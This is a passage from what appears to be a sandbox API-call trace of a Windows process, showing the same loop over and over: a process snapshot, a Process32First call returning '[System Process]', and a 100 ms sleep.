pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.489] Sleep (dwMilliseconds=0x64) [0234.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0234.619] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.892] Sleep (dwMilliseconds=0x64) [0234.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0235.006] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.149] Sleep (dwMilliseconds=0x64) [0235.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0235.205] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.338] Sleep (dwMilliseconds=0x64) [0235.372] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0235.381] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.484] Sleep (dwMilliseconds=0x64) [0235.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0235.549] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.610] Sleep (dwMilliseconds=0x64) [0235.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0235.632] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.803] Sleep (dwMilliseconds=0x64) [0235.921] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0235.931] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.189] Sleep (dwMilliseconds=0x64) [0236.353] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0236.363] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.450] Sleep (dwMilliseconds=0x64) [0236.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0236.479] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.637] Sleep (dwMilliseconds=0x64) [0236.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0236.697] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.802] Sleep (dwMilliseconds=0x64) [0236.809] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0236.818] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.052] Sleep (dwMilliseconds=0x64) [0237.163] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0237.226] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.382] Sleep (dwMilliseconds=0x64) [0237.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0237.431] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.520] Sleep (dwMilliseconds=0x64) [0237.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0237.569] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.791] Sleep (dwMilliseconds=0x64) [0237.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0237.866] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.012] Sleep (dwMilliseconds=0x64) [0238.032] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0238.042] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.209] Sleep (dwMilliseconds=0x64) [0238.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0238.271] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.476] Sleep (dwMilliseconds=0x64) [0238.533] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0238.562] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.679] Sleep (dwMilliseconds=0x64) [0238.684] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0238.694] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.807] Sleep (dwMilliseconds=0x64) [0238.862] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0238.899] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.082] Sleep (dwMilliseconds=0x64) [0239.130] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0239.142] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.230] Sleep (dwMilliseconds=0x64) [0239.350] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0239.370] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.587] Sleep (dwMilliseconds=0x64) [0239.641] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0239.651] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.772] Sleep (dwMilliseconds=0x64) [0239.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0239.788] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.923] Sleep (dwMilliseconds=0x64) [0239.967] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0239.977] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.206] Sleep (dwMilliseconds=0x64) [0240.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0240.298] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.539] Sleep (dwMilliseconds=0x64) [0240.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0240.618] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.789] Sleep (dwMilliseconds=0x64) [0240.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0240.853] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.973] Sleep (dwMilliseconds=0x64) [0240.987] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0241.009] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.121] Sleep (dwMilliseconds=0x64) [0241.187] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0241.198] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.369] Sleep (dwMilliseconds=0x64) [0241.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0241.519] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.613] Sleep (dwMilliseconds=0x64) [0241.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0241.798] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.975] Sleep (dwMilliseconds=0x64) [0242.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0242.066] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.337] Sleep (dwMilliseconds=0x64) [0242.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0242.353] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.466] Sleep (dwMilliseconds=0x64) [0242.517] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0242.528] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.661] Sleep (dwMilliseconds=0x64) [0242.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0242.786] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.995] Sleep (dwMilliseconds=0x64) [0243.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0243.023] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.182] Sleep (dwMilliseconds=0x64) [0243.236] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0243.258] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.427] Sleep (dwMilliseconds=0x64) [0243.504] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0243.516] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.677] Sleep (dwMilliseconds=0x64) [0243.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0243.774] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.959] Sleep (dwMilliseconds=0x64) [0244.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0244.042] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.210] Sleep (dwMilliseconds=0x64) [0244.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0244.226] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.292] Sleep (dwMilliseconds=0x64) [0244.360] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0244.370] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.496] Sleep (dwMilliseconds=0x64) [0244.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0244.595] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.709] Sleep (dwMilliseconds=0x64) [0244.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0244.774] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.845] Sleep (dwMilliseconds=0x64) [0244.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0244.869] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.066] Sleep (dwMilliseconds=0x64) [0245.135] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0245.149] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.339] Sleep (dwMilliseconds=0x64) [0245.436] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0245.457] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.694] Sleep (dwMilliseconds=0x64) [0245.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0245.767] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.971] Sleep (dwMilliseconds=0x64) [0246.033] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0246.052] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.194] Sleep (dwMilliseconds=0x64) [0246.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0246.213] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.408] Sleep (dwMilliseconds=0x64) [0246.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0246.495] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.707] Sleep (dwMilliseconds=0x64) [0246.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0246.726] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.818] Sleep (dwMilliseconds=0x64) [0246.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0246.839] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.024] Sleep (dwMilliseconds=0x64) [0247.078] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0247.098] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.283] Sleep (dwMilliseconds=0x64) [0247.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0247.312] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.382] Sleep (dwMilliseconds=0x64) [0247.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0247.519] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.014] Sleep (dwMilliseconds=0x64) [0248.120] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0248.234] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.340] Sleep (dwMilliseconds=0x64) [0248.431] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0248.442] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.666] Sleep (dwMilliseconds=0x64) [0248.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0248.769] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 